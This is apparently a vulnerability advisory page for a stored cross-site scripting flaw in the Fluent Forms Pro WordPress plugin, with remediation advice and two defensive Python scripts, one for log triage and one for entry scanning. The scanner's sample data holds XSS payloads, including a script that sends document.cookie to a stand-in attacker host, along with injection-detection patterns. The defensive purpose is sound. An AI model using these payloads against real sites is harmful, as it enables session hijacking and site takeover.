CVE-2026-2365 in Fluent Forms Pro Plugin
Summary
by MITRE • 03/05/2026
The Fluent Forms Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `fluentform_step_form_save_data` AJAX action in all versions up to, and including, 6.1.17. This is due to the draft form submission endpoint being publicly accessible without authentication or nonce verification, combined with insufficient input sanitization and output escaping of form field data. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrator views a partial form entry.
Analysis
by VulDB Data Team • 03/05/2026
CVE-2026-2365 is a stored cross-site scripting flaw (CWE-79) in the Fluent Forms Pro plugin for WordPress, affecting all versions up to and including 6.1.17. The weakness sits in the plugin's AJAX handling, specifically the `fluentform_step_form_save_data` action: the draft form submission handler behind it performs neither an authentication check nor nonce verification, so any unauthenticated client can reach it without credentials or a session token. Stored XSS means the attacker-supplied data is persisted and later rendered in the browser of a different user who views the affected content; here that user is an administrator opening partial form entries in the WordPress admin interface, which is what gives the flaw its weight.
Exploitation depends on two missing controls in the form-handling code. First, field values submitted through the vulnerable endpoint are not adequately validated or sanitized before being written to the database. Second, those stored values are not escaped for the HTML context in which they are later rendered. Either control on its own would have limited the damage; with both absent, HTML and script placed in a form field are stored verbatim and rendered verbatim. The affected feature is draft saving for step forms, which exists so a visitor can persist an incomplete entry and finish it later. Because the endpoint accepts requests from anyone, an attacker can submit a payload that executes when an administrator opens the entry in the WordPress admin interface. In ATT&CK terms the initial access step is T1190, Exploit Public-Facing Application: an Internet-facing web application is abused through unvalidated, user-controllable input.
The operational impact goes well beyond running a script once. Code executing in an administrator's browser runs inside that administrator's session: it can read whatever the admin pages expose, redirect the user to a phishing page, and issue requests to wp-admin that carry the administrator's cookies and nonces, which is enough to create accounts, change settings or install code. That is the usual path from a form-field injection to full site compromise, and it does not depend on stealing the session cookie itself (WordPress marks its authentication cookies HttpOnly by default, but the injected script does not need the cookie value, only the browser's willingness to send it). The advisory names 6.1.17 as the last affected version and gives no earliest affected version, so every installation at 6.1.17 or below should be treated as exposed. The risk is highest for sites whose forms handle sensitive data or whose administrators routinely review entries. The attack vector is particularly concerning because no authentication is required: anyone who knows the endpoint can begin injecting payloads immediately, and because the payload is stored, the exposure persists until the malicious content is removed from the database.
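Unauthenticated traffic to the vulnerable action is visible in ordinary web-server logs, so a first triage step is to look for it there. The script below is an added illustration written for this page, not code from Fluent Forms or VulDB. It assumes the WordPress `action` parameter appears in the query string so that a standard combined-format access log records it; if your site sends the action only in the POST body, feed it the request log of a WAF or reverse proxy that captures the body instead (the matching logic is the same). The log lines are constructed sample data, and the host name `example.com` and the burst threshold are assumptions to adjust for your site.

```python
"""Flag access-log activity against the draft-save AJAX action.

Added illustration, not code from Fluent Forms or VulDB. Assumes the
WordPress action name is passed in the query string so it appears in a
standard combined-format access log.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

VULN_ACTION = "fluentform_step_form_save_data"   # action named in the advisory
AJAX_PATH = "/wp-admin/admin-ajax.php"

# Constructed sample traffic (not real logs): one browser-originated draft save
# with an on-site Referer, then a burst of tool-driven requests with no Referer.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Mar/2026:10:01:12 +0000] "POST /wp-admin/admin-ajax.php?action=fluentform_step_form_save_data HTTP/1.1" 200 143 "https://example.com/contact/" "Mozilla/5.0"
198.51.100.9 - - [05/Mar/2026:10:01:15 +0000] "POST /wp-admin/admin-ajax.php?action=fluentform_step_form_save_data HTTP/1.1" 200 143 "-" "python-requests/2.31"
198.51.100.9 - - [05/Mar/2026:10:01:16 +0000] "POST /wp-admin/admin-ajax.php?action=fluentform_step_form_save_data HTTP/1.1" 200 143 "-" "python-requests/2.31"
198.51.100.9 - - [05/Mar/2026:10:01:17 +0000] "POST /wp-admin/admin-ajax.php?action=fluentform_step_form_save_data HTTP/1.1" 200 143 "-" "python-requests/2.31"
203.0.113.7 - - [05/Mar/2026:10:02:30 +0000] "GET /contact/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None on mismatch."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def is_draft_save(rec):
    """True when the record is a POST to admin-ajax.php carrying the vulnerable action."""
    if rec["method"] != "POST":
        return False
    url = urlsplit(rec["target"])
    if url.path != AJAX_PATH:
        return False
    return VULN_ACTION in parse_qs(url.query).get("action", [])


def analyze(log_text, site_host, burst_threshold=3):
    """Summarise draft-save requests per client IP.

    An IP is flagged when it sends `burst_threshold` or more draft saves
    within one minute, or any draft save without an on-site Referer. Neither
    signal proves exploitation: genuine visitors also save drafts anonymously,
    and the nonce a fixed version checks is not visible in an access log.
    Use the result to decide which stored entries to inspect first.
    """
    per_ip = defaultdict(lambda: {"count": 0, "foreign_referer": 0, "max_per_minute": 0})
    per_minute = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_draft_save(rec):
            continue
        stats = per_ip[rec["ip"]]
        stats["count"] += 1
        if urlsplit(rec["referer"]).hostname != site_host:   # "-" parses to None
            stats["foreign_referer"] += 1
        key = (rec["ip"], rec["ts"].replace(second=0))
        per_minute[key] += 1
        stats["max_per_minute"] = max(stats["max_per_minute"], per_minute[key])
    for stats in per_ip.values():
        stats["flagged"] = (stats["max_per_minute"] >= burst_threshold
                            or stats["foreign_referer"] > 0)
    return dict(per_ip)


if __name__ == "__main__":
    for ip, stats in analyze(SAMPLE_LOG, "example.com").items():
        print(ip, stats)
```

Run it against a real log with `analyze(open("access.log").read(), "your-host")`. The Referer signal is weak on its own (browsers and privacy extensions strip it), so treat a flagged IP as a pointer to which entries to review, not as evidence by itself.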
Affected sites should update to a release later than 6.1.17, which the advisory names as the last affected version. Where that cannot happen immediately, block or rate-limit POST requests to admin-ajax.php that carry `action=fluentform_step_form_save_data` at a web application firewall or reverse proxy, accepting that this also disables legitimate draft saving until the update lands. After updating, audit stored entries, including partial and draft entries, for injected HTML before anyone opens them in the admin interface, and treat any administrator who has already viewed a suspect entry as potentially compromised: review users, plugins and recent configuration changes. A correct fix needs three independent pieces: nonce verification on the AJAX handler (WordPress provides `check_ajax_referer` for this), sanitization of field values when they are stored, and escaping of those values for HTML wherever the admin views render them. Sanitization on input and escaping on output are separate controls and both are required. Security teams should also watch for unusual volumes of requests to this action or to other plugin AJAX endpoints, and the remediation should include reviewing the plugin's other AJAX handlers, both the `wp_ajax_` and the `wp_ajax_nopriv_` hooks, for the same missing checks, since one handler that skips authentication and nonce validation often has siblings that do the same.
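The audit step above is the one most often skipped, because the stored payload is invisible until an administrator loads the entry. The scanner below is an added example written for this page and is not the plugin's own code. It takes a constructed export of submission rows shaped as an entry id plus a field-to-value map (the hypothetical `response` key; map your real export, for example a JSON response column, to that shape), walks every string value including nested lists, and reports fields containing script tags, event handlers, `javascript:` URIs or embedding tags, checking each value both as stored and after undoing one layer of URL and HTML-entity encoding so that disguised payloads are not missed. The patterns are a triage heuristic, not a complete XSS grammar.

```python
"""Scan stored form entries for injected HTML/script before an admin views them.

Added illustration, not the plugin's own code. Entries are a constructed
sample shaped like an export of submission rows ({"id": ..., "response": {...}}).
"""
import html
import json
import re
from urllib.parse import unquote

# Constructed sample rows (not real submissions). 101 and 106 are benign;
# 106 checks that ordinary markup and a stray "<" are not flagged.
SAMPLE_ENTRIES_JSON = json.dumps([
    {"id": 101, "response": {"name": "Ada", "email": "ada@example.org",
                             "message": "Hello, is there a price list?"}},
    {"id": 102, "response": {"name": "<script>fetch('https://attacker.invalid/?c='+document.cookie)</script>",
                             "email": "x@example.org"}},
    {"id": 103, "response": {"name": "<img src=x onerror=alert(1)>", "message": "hi"}},
    {"id": 104, "response": {"message": "&lt;svg onload=alert(1)&gt;"}},      # entity-encoded once
    {"id": 105, "response": {"website": "javascript:alert(document.domain)"}},
    {"id": 106, "response": {"message": "Use <b>bold</b> and a < b comparison",
                             "interests": ["sales", "support"]}},
])

# Each pattern names one construct that can execute script when rendered unescaped.
SUSPICIOUS = [
    ("script tag", re.compile(r"<\s*script\b", re.I)),
    ("event handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript: URI", re.compile(r"javascript\s*:", re.I)),
    ("embedding tag", re.compile(r"<\s*(iframe|svg|object|embed|math)\b", re.I)),
    ("srcdoc/data URI", re.compile(r"(srcdoc\s*=|data\s*:\s*text/html)", re.I)),
]


def normalize(value):
    """Undo one layer each of URL and HTML-entity encoding so disguised payloads match."""
    return html.unescape(unquote(value))


def iter_strings(value, path=""):
    """Yield (field_path, string) for every string inside a nested field map."""
    if isinstance(value, dict):
        for key, item in value.items():
            yield from iter_strings(item, f"{path}.{key}" if path else key)
    elif isinstance(value, list):
        for i, item in enumerate(value):
            yield from iter_strings(item, f"{path}[{i}]")
    elif isinstance(value, str):
        yield path, value


def classify(text):
    """Return the names of suspicious patterns found in text, raw or after decoding."""
    decoded = normalize(text)
    return [name for name, rx in SUSPICIOUS if rx.search(text) or rx.search(decoded)]


def audit(entries_json):
    """Return {entry_id: [(field_path, [pattern names]), ...]} for entries needing review."""
    findings = {}
    for entry in json.loads(entries_json):
        for field, text in iter_strings(entry.get("response", {})):
            hits = classify(text)
            if hits:
                findings.setdefault(entry["id"], []).append((field, hits))
    return findings


if __name__ == "__main__":
    for entry_id, fields in sorted(audit(SAMPLE_ENTRIES_JSON).items()):
        for field, hits in fields:
            print(f"entry {entry_id}: field {field!r} -> {', '.join(hits)}")
```

Review flagged entries in a client that does not render HTML (a database shell or a plain-text export), delete or neutralise them there rather than from the WordPress admin screens, and keep a copy for the incident record.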